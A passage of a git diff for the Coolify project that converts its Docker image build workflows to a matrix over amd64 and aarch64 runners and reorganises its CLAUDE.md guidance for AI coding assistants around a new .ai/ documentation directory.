}}-next-aarch64 \ + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-amd64 \ + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-aarch64 \ --tag ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next \ --tag ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:next diff --git a/.github/workflows/coolify-helper.yml b/.github/workflows/coolify-helper.yml index 738a3480c..0c9996ec8 100644 --- a/.github/workflows/coolify-helper.yml +++ b/.github/workflows/coolify-helper.yml @@ -17,8 +17,17 @@ env: IMAGE_NAME: "coollabsio/coolify-helper" jobs: - amd64: - runs-on: ubuntu-latest + build-push: + strategy: + matrix: + include: + - arch: amd64 + platform: linux/amd64 + runner: ubuntu-24.04 + - arch: aarch64 + platform: linux/aarch64 + runner: ubuntu-24.04-arm + runs-on: ${{ matrix.runner }} steps: - uses: actions/checkout@v5 with: @@ -43,59 +52,21 @@ jobs: run: | echo "VERSION=$(docker run --rm -v "$(pwd):/app" -w /app php:8.2-alpine3.16 php bootstrap/getHelperVersion.php)"|xargs >> $GITHUB_OUTPUT - - name: Build and Push Image + - name: Build and Push Image (${{ matrix.arch }}) uses: docker/build-push-action@v6 with: context: . file: docker/coolify-helper/Dockerfile - platforms: linux/amd64 + platforms: ${{ matrix.platform }} push: true tags: | - ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }} - ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }} - labels: | - coolify.managed=true - aarch64: - runs-on: [ self-hosted, arm64 ] - steps: - - uses: actions/checkout@v5 - with: - persist-credentials: false - - - name: Login to ${{ env.GITHUB_REGISTRY }} - uses: docker/login-action@v3 - with: - registry: ${{ env.GITHUB_REGISTRY }} - username: ${{ github.actor }} - password: ${{ secrets.GITHUB_TOKEN }} - - - name: Login to ${{ env.DOCKER_REGISTRY }} - uses: docker/login-action@v3 - with: - registry: ${{ env.DOCKER_REGISTRY }} - username: ${{ secrets.DOCKER_USERNAME }} - password: ${{ secrets.DOCKER_TOKEN }} - - - name: Get Version - id: version - run: | - echo "VERSION=$(docker run --rm -v "$(pwd):/app" -w /app php:8.2-alpine3.16 php bootstrap/getHelperVersion.php)"|xargs >> $GITHUB_OUTPUT - - - name: Build and Push Image - uses: docker/build-push-action@v6 - with: - context: . - file: docker/coolify-helper/Dockerfile - platforms: linux/aarch64 - push: true - tags: | - ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 - ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-${{ matrix.arch }} + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-${{ matrix.arch }} labels: | coolify.managed=true merge-manifest: - runs-on: ubuntu-latest - needs: [ amd64, aarch64 ] + runs-on: ubuntu-24.04 + needs: build-push steps: - uses: actions/checkout@v5 with: @@ -125,14 +96,16 @@ jobs: - name: Create & publish manifest on ${{ env.GITHUB_REGISTRY }} run: | docker buildx imagetools create \ - --append ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 \ + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-amd64 \ + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 \ --tag ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }} \ --tag ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:latest - name: Create & publish manifest on ${{ env.DOCKER_REGISTRY }} run: | docker buildx imagetools create \ - --append ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 \ + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-amd64 \ + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 \ --tag ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }} \ --tag ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:latest diff --git a/.github/workflows/coolify-production-build.yml b/.github/workflows/coolify-production-build.yml index b6cfd34ae..21871b103 100644 --- a/.github/workflows/coolify-production-build.yml +++ b/.github/workflows/coolify-production-build.yml @@ -24,8 +24,17 @@ env: IMAGE_NAME: "coollabsio/coolify" jobs: - amd64: - runs-on: ubuntu-latest + build-push: + strategy: + matrix: + include: + - arch: amd64 + platform: linux/amd64 + runner: ubuntu-24.04 + - arch: aarch64 + platform: linux/aarch64 + runner: ubuntu-24.04-arm + runs-on: ${{ matrix.runner }} steps: - uses: actions/checkout@v5 with: @@ -50,57 +59,20 @@ jobs: run: | echo "VERSION=$(docker run --rm -v "$(pwd):/app" -w /app php:8.2-alpine3.16 php bootstrap/getVersion.php)"|xargs >> $GITHUB_OUTPUT - - name: Build and Push Image + - name: Build and Push Image (${{ matrix.arch }}) uses: docker/build-push-action@v6 with: context: . file: docker/production/Dockerfile - platforms: linux/amd64 + platforms: ${{ matrix.platform }} push: true tags: | - ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }} - ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }} - - aarch64: - runs-on: [self-hosted, arm64] - steps: - - uses: actions/checkout@v5 - with: - persist-credentials: false - - - name: Login to ${{ env.GITHUB_REGISTRY }} - uses: docker/login-action@v3 - with: - registry: ${{ env.GITHUB_REGISTRY }} - username: ${{ github.actor }} - password: ${{ secrets.GITHUB_TOKEN }} - - - name: Login to ${{ env.DOCKER_REGISTRY }} - uses: docker/login-action@v3 - with: - registry: ${{ env.DOCKER_REGISTRY }} - username: ${{ secrets.DOCKER_USERNAME }} - password: ${{ secrets.DOCKER_TOKEN }} - - - name: Get Version - id: version - run: | - echo "VERSION=$(docker run --rm -v "$(pwd):/app" -w /app php:8.2-alpine3.16 php bootstrap/getVersion.php)"|xargs >> $GITHUB_OUTPUT - - - name: Build and Push Image - uses: docker/build-push-action@v6 - with: - context: . - file: docker/production/Dockerfile - platforms: linux/aarch64 - push: true - tags: | - ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 - ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-${{ matrix.arch }} + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-${{ matrix.arch }} merge-manifest: - runs-on: ubuntu-latest - needs: [amd64, aarch64] + runs-on: ubuntu-24.04 + needs: build-push steps: - uses: actions/checkout@v5 with: @@ -130,14 +102,16 @@ jobs: - name: Create & publish manifest on ${{ env.GITHUB_REGISTRY }} run: | docker buildx imagetools create \ - --append ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 \ + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-amd64 \ + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 \ --tag ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }} \ --tag ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:latest - name: Create & publish manifest on ${{ env.DOCKER_REGISTRY }} run: | docker buildx imagetools create \ - --append ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 \ + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-amd64 \ + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 \ --tag ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }} \ --tag ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:latest diff --git a/.github/workflows/coolify-realtime-next.yml b/.github/workflows/coolify-realtime-next.yml index 7a6071bde..7ab4dcc42 100644 --- a/.github/workflows/coolify-realtime-next.yml +++ b/.github/workflows/coolify-realtime-next.yml @@ -21,8 +21,17 @@ env: IMAGE_NAME: "coollabsio/coolify-realtime" jobs: - amd64: - runs-on: ubuntu-latest + build-push: + strategy: + matrix: + include: + - arch: amd64 + platform: linux/amd64 + runner: ubuntu-24.04 + - arch: aarch64 + platform: linux/aarch64 + runner: ubuntu-24.04-arm + runs-on: ${{ matrix.runner }} steps: - uses: actions/checkout@v5 with: @@ -47,62 +56,22 @@ jobs: run: | echo "VERSION=$(docker run --rm -v "$(pwd):/app" -w /app php:8.2-alpine3.16 php bootstrap/getRealtimeVersion.php)"|xargs >> $GITHUB_OUTPUT - - name: Build and Push Image + - name: Build and Push Image (${{ matrix.arch }}) uses: docker/build-push-action@v6 with: context: . file: docker/coolify-realtime/Dockerfile - platforms: linux/amd64 + platforms: ${{ matrix.platform }} push: true tags: | - ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next - ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next - labels: | - coolify.managed=true - - aarch64: - runs-on: [ self-hosted, arm64 ] - steps: - - uses: actions/checkout@v5 - with: - persist-credentials: false - - - - name: Login to ${{ env.GITHUB_REGISTRY }} - uses: docker/login-action@v3 - with: - registry: ${{ env.GITHUB_REGISTRY }} - username: ${{ github.actor }} - password: ${{ secrets.GITHUB_TOKEN }} - - - name: Login to ${{ env.DOCKER_REGISTRY }} - uses: docker/login-action@v3 - with: - registry: ${{ env.DOCKER_REGISTRY }} - username: ${{ secrets.DOCKER_USERNAME }} - password: ${{ secrets.DOCKER_TOKEN }} - - - name: Get Version - id: version - run: | - echo "VERSION=$(docker run --rm -v "$(pwd):/app" -w /app php:8.2-alpine3.16 php bootstrap/getRealtimeVersion.php)"|xargs >> $GITHUB_OUTPUT - - - name: Build and Push Image - uses: docker/build-push-action@v6 - with: - context: . - file: docker/coolify-realtime/Dockerfile - platforms: linux/aarch64 - push: true - tags: | - ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-aarch64 - ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-aarch64 + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-${{ matrix.arch }} + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-${{ matrix.arch }} labels: | coolify.managed=true merge-manifest: - runs-on: ubuntu-latest - needs: [ amd64, aarch64 ] + runs-on: ubuntu-24.04 + needs: build-push steps: - uses: actions/checkout@v5 with: @@ -132,14 +101,16 @@ jobs: - name: Create & publish manifest on ${{ env.GITHUB_REGISTRY }} run: | docker buildx imagetools create \ - --append ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-aarch64 \ + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-amd64 \ + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-aarch64 \ --tag ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next \ --tag ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:next - name: Create & publish manifest on ${{ env.DOCKER_REGISTRY }} run: | docker buildx imagetools create \ - --append ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-aarch64 \ + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-amd64 \ + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next-aarch64 \ --tag ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-next \ --tag ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:next diff --git a/.github/workflows/coolify-realtime.yml b/.github/workflows/coolify-realtime.yml index 1074af3ee..5efe445c5 100644 --- a/.github/workflows/coolify-realtime.yml +++ b/.github/workflows/coolify-realtime.yml @@ -21,8 +21,17 @@ env: IMAGE_NAME: "coollabsio/coolify-realtime" jobs: - amd64: - runs-on: ubuntu-latest + build-push: + strategy: + matrix: + include: + - arch: amd64 + platform: linux/amd64 + runner: ubuntu-24.04 + - arch: aarch64 + platform: linux/aarch64 + runner: ubuntu-24.04-arm + runs-on: ${{ matrix.runner }} steps: - uses: actions/checkout@v5 with: @@ -47,61 +56,22 @@ jobs: run: | echo "VERSION=$(docker run --rm -v "$(pwd):/app" -w /app php:8.2-alpine3.16 php bootstrap/getRealtimeVersion.php)"|xargs >> $GITHUB_OUTPUT - - name: Build and Push Image + - name: Build and Push Image (${{ matrix.arch }}) uses: docker/build-push-action@v6 with: context: . file: docker/coolify-realtime/Dockerfile - platforms: linux/amd64 + platforms: ${{ matrix.platform }} push: true tags: | - ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }} - ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }} - labels: | - coolify.managed=true - - aarch64: - runs-on: [ self-hosted, arm64 ] - steps: - - uses: actions/checkout@v5 - with: - persist-credentials: false - - - name: Login to ${{ env.GITHUB_REGISTRY }} - uses: docker/login-action@v3 - with: - registry: ${{ env.GITHUB_REGISTRY }} - username: ${{ github.actor }} - password: ${{ secrets.GITHUB_TOKEN }} - - - name: Login to ${{ env.DOCKER_REGISTRY }} - uses: docker/login-action@v3 - with: - registry: ${{ env.DOCKER_REGISTRY }} - username: ${{ secrets.DOCKER_USERNAME }} - password: ${{ secrets.DOCKER_TOKEN }} - - - name: Get Version - id: version - run: | - echo "VERSION=$(docker run --rm -v "$(pwd):/app" -w /app php:8.2-alpine3.16 php bootstrap/getRealtimeVersion.php)"|xargs >> $GITHUB_OUTPUT - - - name: Build and Push Image - uses: docker/build-push-action@v6 - with: - context: . - file: docker/coolify-realtime/Dockerfile - platforms: linux/aarch64 - push: true - tags: | - ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 - ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-${{ matrix.arch }} + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-${{ matrix.arch }} labels: | coolify.managed=true merge-manifest: - runs-on: ubuntu-latest - needs: [ amd64, aarch64 ] + runs-on: ubuntu-24.04 + needs: build-push steps: - uses: actions/checkout@v5 with: @@ -131,14 +101,16 @@ jobs: - name: Create & publish manifest on ${{ env.GITHUB_REGISTRY }} run: | docker buildx imagetools create \ - --append ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 \ + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-amd64 \ + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 \ --tag ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }} \ --tag ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:latest - name: Create & publish manifest on ${{ env.DOCKER_REGISTRY }} run: | docker buildx imagetools create \ - --append ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 \ + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-amd64 \ + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }}-aarch64 \ --tag ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:${{ steps.version.outputs.VERSION }} \ --tag ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:latest diff --git a/.github/workflows/coolify-testing-host.yml b/.github/workflows/coolify-testing-host.yml index c4aecd85e..24133887a 100644 --- a/.github/workflows/coolify-testing-host.yml +++ b/.github/workflows/coolify-testing-host.yml @@ -17,8 +17,17 @@ env: IMAGE_NAME: "coollabsio/coolify-testing-host" jobs: - amd64: - runs-on: ubuntu-latest + build-push: + strategy: + matrix: + include: + - arch: amd64 + platform: linux/amd64 + runner: ubuntu-24.04 + - arch: aarch64 + platform: linux/aarch64 + runner: ubuntu-24.04-arm + runs-on: ${{ matrix.runner }} steps: - uses: actions/checkout@v5 with: @@ -38,56 +47,22 @@ jobs: username: ${{ secrets.DOCKER_USERNAME }} password: ${{ secrets.DOCKER_TOKEN }} - - name: Build and Push Image + - name: Build and Push Image (${{ matrix.arch }}) uses: docker/build-push-action@v6 with: context: . file: docker/testing-host/Dockerfile - platforms: linux/amd64 + platforms: ${{ matrix.platform }} push: true tags: | - ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:latest - ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:latest - labels: | - coolify.managed=true - - aarch64: - runs-on: [ self-hosted, arm64 ] - steps: - - uses: actions/checkout@v5 - with: - persist-credentials: false - - - name: Login to ${{ env.GITHUB_REGISTRY }} - uses: docker/login-action@v3 - with: - registry: ${{ env.GITHUB_REGISTRY }} - username: ${{ github.actor }} - password: ${{ secrets.GITHUB_TOKEN }} - - - name: Login to ${{ env.DOCKER_REGISTRY }} - uses: docker/login-action@v3 - with: - registry: ${{ env.DOCKER_REGISTRY }} - username: ${{ secrets.DOCKER_USERNAME }} - password: ${{ secrets.DOCKER_TOKEN }} - - - name: Build and Push Image - uses: docker/build-push-action@v6 - with: - context: . - file: docker/testing-host/Dockerfile - platforms: linux/aarch64 - push: true - tags: | - ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:latest-aarch64 - ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:latest-aarch64 + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:latest-${{ matrix.arch }} + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:latest-${{ matrix.arch }} labels: | coolify.managed=true merge-manifest: - runs-on: ubuntu-latest - needs: [ amd64, aarch64 ] + runs-on: ubuntu-24.04 + needs: build-push steps: - uses: actions/checkout@v5 with: @@ -112,13 +87,15 @@ jobs: - name: Create & publish manifest on ${{ env.GITHUB_REGISTRY }} run: | docker buildx imagetools create \ - --append ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:latest-aarch64 \ + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:latest-amd64 \ + ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:latest-aarch64 \ --tag ${{ env.GITHUB_REGISTRY }}/${{ env.IMAGE_NAME }}:latest - name: Create & publish manifest on ${{ env.DOCKER_REGISTRY }} run: | docker buildx imagetools create \ - --append ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:latest-aarch64 \ + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:latest-amd64 \ + ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:latest-aarch64 \ --tag ${{ env.DOCKER_REGISTRY }}/${{ env.IMAGE_NAME }}:latest - uses: sarisia/actions-status-discord@v1 diff --git a/CLAUDE.md b/CLAUDE.md index 6434ef877..b7c496e42 100644 --- a/CLAUDE.md +++ b/CLAUDE.md @@ -2,9 +2,9 @@ # CLAUDE.md This file provides guidance to **Claude Code** (claude.ai/code) when working with code in this repository. -> **Note for AI Assistants**: This file is specifically for Claude Code. If you're using Cursor IDE, refer to the `.cursor/rules/` directory for detailed rule files. Both systems share core principles but are optimized for their respective workflows. +> **Note for AI Assistants**: This file is specifically for Claude Code. All detailed documentation is in the `.ai/` directory. Both Claude Code and Cursor IDE use the same source files in `.ai/` for consistency. > -> **Maintaining Instructions**: When updating AI instructions, see [.AI_INSTRUCTIONS_SYNC.md](.AI_INSTRUCTIONS_SYNC.md) for synchronization guidelines between CLAUDE.md and .cursor/rules/. +> **Maintaining Instructions**: When updating AI instructions, see [.ai/meta/sync-guide.md](.ai/meta/sync-guide.md) and [.ai/meta/maintaining-docs.md](.ai/meta/maintaining-docs.md) for guidelines. ## Project Overview @@ -27,7 +27,8 @@ ### Backend Development ### Code Quality - `./vendor/bin/pint` - Run Laravel Pint for code formatting - `./vendor/bin/phpstan` - Run PHPStan for static analysis -- `./vendor/bin/pest` - Run Pest tests (unit tests only, without database) +- `./vendor/bin/pest tests/Unit` - Run unit tests only (no database, can run outside Docker) +- `./vendor/bin/pest` - Run ALL tests (includes Feature tests, may require database) ### Running Tests **IMPORTANT**: Tests that require database connections MUST be run inside the Docker container: @@ -39,12 +40,14 @@ ### Running Tests ## Architecture Overview ### Technology Stack -- **Backend**: Laravel 12 (PHP 8.4) -- **Frontend**: Livewire 3.5+ with Alpine.js and Tailwind CSS 4.1+ +- **Backend**: Laravel 12.4.1 (PHP 8.4.7) +- **Frontend**: Livewire 3.5.20 with Alpine.js and Tailwind CSS 4.1.4 - **Database**: PostgreSQL 15 (primary), Redis 7 (cache/queues) - **Real-time**: Soketi (WebSocket server) - **Containerization**: Docker & Docker Compose -- **Queue Management**: Laravel Horizon +- **Queue Management**: Laravel Horizon 5.30.3 + +> **Note**: For complete version information and all dependencies, see [.ai/core/technology-stack.md](.ai/core/technology-stack.md) ### Key Components @@ -256,453 +259,61 @@ ## Important Reminders ## Additional Documentation -This file contains high-level guidelines for Claude Code. For **more detailed, topic-specific documentation**, refer to the `.cursor/rules/` directory (also accessible by Cursor IDE and other AI assistants): +This file contains high-level guidelines for Claude Code. For **more detailed, topic-specific documentation**, refer to the `.ai/` directory: -> **Cross-Reference**: The `.cursor/rules/` directory contains comprehensive, detailed documentation organized by topic. Start with [.cursor/rules/README.mdc](.cursor/rules/README.mdc) for an overview, then explore specific topics below. +> **Documentation Hub**: The `.ai/` directory contains comprehensive, detailed documentation organized by topic. Start with [.ai/README.md](.ai/README.md) for navigation, then explore specific topics below. -### Architecture & Patterns -- [Application Architecture](.cursor/rules/application-architecture.mdc) - Detailed application structure -- [Deployment Architecture](.cursor/rules/deployment-architecture.mdc) - Deployment patterns and flows -- [Database Patterns](.cursor/rules/database-patterns.mdc) - Database design and query patterns -- [Frontend Patterns](.cursor/rules/frontend-patterns.mdc) - Livewire and Alpine.js patterns -- [API & Routing](.cursor/rules/api-and-routing.mdc) - API design and routing conventions +### Core Documentation +- [Technology Stack](.ai/core/technology-stack.md) - All versions, packages, and dependencies (single source of truth) +- [Project Overview](.ai/core/project-overview.md) - What Coolify is and how it works +- [Application Architecture](.ai/core/application-architecture.md) - System design and component relationships +- [Deployment Architecture](.ai/core/deployment-architecture.md) - How deployments work end-to-end -### Development & Security -- [Development Workflow](.cursor/rules/development-workflow.mdc) - Development best practices -- [Security Patterns](.cursor/rules/security-patterns.mdc) - Security implementation details -- [Form Components](.cursor/rules/form-components.mdc) - Enhanced form components with authorization -- [Testing Patterns](.cursor/rules/testing-patterns.mdc) - Testing strategies and examples +### Development Practices +- [Development Workflow](.ai/development/development-workflow.md) - Development setup, commands, and workflows +- [Testing Patterns](.ai/development/testing-patterns.md) - Testing strategies and examples (Docker requirements!) +- [Laravel Boost](.ai/development/laravel-boost.md) - Laravel-specific guidelines and best practices -### Project Information -- [Project Overview](.cursor/rules/project-overview.mdc) - High-level project structure -- [Technology Stack](.cursor/rules/technology-stack.mdc) - Detailed tech stack information -- [Cursor Rules Guide](.cursor/rules/cursor_rules.mdc) - How to maintain cursor rules +### Code Patterns +- [Database Patterns](.ai/patterns/database-patterns.md) - Eloquent, migrations, relationships +- [Frontend Patterns](.ai/patterns/frontend-patterns.md) - Livewire, Alpine.js, Tailwind CSS +- [Security Patterns](.ai/patterns/security-patterns.md) - Authentication, authorization, security +- [Form Components](.ai/patterns/form-components.md) - Enhanced form components with authorization +- [API & Routing](.ai/patterns/api-and-routing.md) - API design and routing conventions -=== +### Meta Documentation +- [Maintaining Docs](.ai/meta/maintaining-docs.md) - How to update and improve AI documentation +- [Sync Guide](.ai/meta/sync-guide.md) - Keeping documentation synchronized - -=== foundation rules === +## Laravel Boost Guidelines -# Laravel Boost Guidelines +> **Full Guidelines**: See [.ai/development/laravel-boost.md](.ai/development/laravel-boost.md) for complete Laravel Boost guidelines. -The Laravel Boost guidelines are specifically curated by Laravel maintainers for this application. These guidelines should be followed closely to enhance the user's satisfaction building Laravel applications. +### Essential Laravel Patterns -## Foundational Context -This application is a Laravel application and its main Laravel ecosystems package & versions are below. You are an expert with them all. Ensure you abide by these specific packages & versions. +- Use PHP 8.4 constructor property promotion and typed properties +- Follow PSR-12 (run `./vendor/bin/pint` before committing) +- Use Eloquent ORM, avoid raw queries +- Use Form Request classes for validation +- Queue heavy operations with Laravel Horizon +- Never use `env()` outside config files +- Use named routes with `route()` function +- Laravel 12 with Laravel 10 structure (no bootstrap/app.php) -- php - 8.4.7 -- laravel/fortify (FORTIFY) - v1 -- laravel/framework (LARAVEL) - v12 -- laravel/horizon (HORIZON) - v5 -- laravel/prompts (PROMPTS) - v0 -- laravel/sanctum (SANCTUM) - v4 -- laravel/socialite (SOCIALITE) - v5 -- livewire/livewire (LIVEWIRE) - v3 -- laravel/dusk (DUSK) - v8 -- laravel/pint (PINT) - v1 -- laravel/telescope (TELESCOPE) - v5 -- pestphp/pest (PEST) - v3 -- phpunit/phpunit (PHPUNIT) - v11 -- rector/rector (RECTOR) - v2 -- laravel-echo (ECHO) - v2 -- tailwindcss (TAILWINDCSS) - v4 -- vue (VUE) - v3 +### Testing Requirements +- **Unit tests**: No database, use mocking, run with `./vendor/bin/pest tests/Unit` +- **Feature tests**: Can use database, run with `docker exec coolify php artisan test` +- Every change must have tests +- Use Pest for all tests -## Conventions -- You must follow all existing code conventions used in this application. When creating or editing a file, check sibling files for the correct structure, approach, naming. -- Use descriptive names for variables and methods. For example, `isRegisteredForDiscounts`, not `discount()`. -- Check for existing components to reuse before writing a new one. +### Livewire & Frontend -## Verification Scripts -- Do not create verification scripts or tinker when tests cover that functionality and prove it works. Unit and feature tests are more important. - -## Application Structure & Architecture -- Stick to existing directory structure - don't create new base folders without approval. -- Do not change the application's dependencies without approval. - -## Frontend Bundling -- If the user doesn't see a frontend change reflected in the UI, it could mean they need to run `npm run build`, `npm run dev`, or `composer run dev`. Ask them. - -## Replies -- Be concise in your explanations - focus on what's important rather than explaining obvious details. - -## Documentation Files -- You must only create documentation files if explicitly requested by the user. - - -=== boost rules === - -## Laravel Boost -- Laravel Boost is an MCP server that comes with powerful tools designed specifically for this application. Use them. - -## Artisan -- Use the `list-artisan-commands` tool when you need to call an Artisan command to double check the available parameters. - -## URLs -- Whenever you share a project URL with the user you should use the `get-absolute-url` tool to ensure you're using the correct scheme, domain / IP, and port. - -## Tinker / Debugging -- You should use the `tinker` tool when you need to execute PHP to debug code or query Eloquent models directly. -- Use the `database-query` tool when you only need to read from the database. - -## Reading Browser Logs With the `browser-logs` Tool -- You can read browser logs, errors, and exceptions using the `browser-logs` tool from Boost. -- Only recent browser logs will be useful - ignore old logs. - -## Searching Documentation (Critically Important) -- Boost comes with a powerful `search-docs` tool you should use before any other approaches. This tool automatically passes a list of installed packages and their versions to the remote Boost API, so it returns only version-specific documentation specific for the user's circumstance. You should pass an array of packages to filter on if you know you need docs for particular packages. -- The 'search-docs' tool is perfect for all Laravel related packages, including Laravel, Inertia, Livewire, Filament, Tailwind, Pest, Nova, Nightwatch, etc. -- You must use this tool to search for Laravel-ecosystem documentation before falling back to other approaches. -- Search the documentation before making code changes to ensure we are taking the correct approach. -- Use multiple, broad, simple, topic based queries to start. For example: `['rate limiting', 'routing rate limiting', 'routing']`. -- Do not add package names to queries - package information is already shared. For example, use `test resource table`, not `filament 4 test resource table`. - -### Available Search Syntax -- You can and should pass multiple queries at once. The most relevant results will be returned first. - -1. Simple Word Searches with 